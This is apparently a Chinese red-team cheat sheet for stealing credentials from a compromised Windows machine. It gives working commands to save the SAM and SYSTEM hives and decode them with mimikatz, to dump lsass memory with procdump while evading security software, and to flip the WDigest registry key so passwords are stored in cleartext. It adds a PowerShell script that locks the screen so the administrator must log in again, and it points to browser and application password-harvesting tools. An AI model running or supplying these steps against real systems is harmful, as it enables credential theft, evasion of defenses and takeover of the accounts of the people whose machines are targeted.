通过注册表抓取密码hash
⾸先我们需要把当前系统注册表 SAM、SYSTEM 获取到： 然后把这两个⽂件拖回本地然后⽤ mimikatz 抓取密码hash：
reg save HKLM\SYSTEM Sys.hiv
reg save HKLM\SAM Sam.hiv

mimikatz "lsadump::sam /sam:Sam.hiv /system:Sys.hiv" exit

抓到哈希，然后解密就得到主机密码了

直接用mimikataz抓明文或者是哈希

通过 Procdump 获取 lsass 抓内存中的明⽂密码

用这个工具动静会比直接抓密码小一些
Procdump 是微软官⽅发布的⼯具，使⽤该⼯具可以把 lsass 的内存 dump下来，可以绕过⼤多数的防护软件。 lsass 进程⾥⾯存放了我们登陆的账号密码等信息，也就是说你登陆了⼀台机器，那么 lsass 进程就会记录你的登 陆凭证，通过 lsass 我们就能够获取到机器的明⽂密码等hash信息。

procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

⾼版本操作获取当前机器上的明⽂密码及hash

⼿⼯修改注册表 + 强制锁屏 + 等待⽬标系统管理员重新登录 = 截取明⽂密 码
虽然默认在 2012r2 之后的系统中已禁⽌在缓存中保存密码明⽂，但是我们已经拿到了⽬标机器的管理权限，此时 可以⾃⾏通过修改注册表的⽅式来强制让它存明⽂，但前提是⽤户必须得先注销再重新登录才能⽣效，否则是获取 不到的：

查看注册表

regedit

默认情况下系统是没有这个项值的

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

这个时候通过往注册表添加⼀个键和值：
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

然后就能用mimikataz抓密码了
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

如果这台机器一直不关机，我们可以用powershell来让他锁屏。

Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -
namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

powershell -file lock.ps1

Chrome、firefox、360 浏览器保存的密码获取
这是⼀个抓取浏览器密码的⼯具，下载直接运行就行，下载地址：
https://github.com/QAX-A-Team/BrowserGhost

获取各类密码
LaZagne是⽤于开源应⽤程序获取⼤量的密码存储在本地计算机上。每个软件都使⽤不同的技术（明⽂、API、⾃ 定义算法、数据库等）存储其密码。开发此⼯具的⽬的是为最常⽤的软件查找这些密码。
下载地址：https://github.com/AlessandroZ/LaZagne 使⽤⽅法也很简单：

laZagne.exe all
红队技巧-内网下的凭据解密
https://mp.weixin.qq.com/s/sw21OBVtst16lXG3MBziQQ

今天这篇文章就不说Windows 明文hash的获取，着重写一些常规运维软件的密码获取，例如navicat，vnc，xshell，xftp，WinSCP，SecureCRT，vcenter 等连接密码获取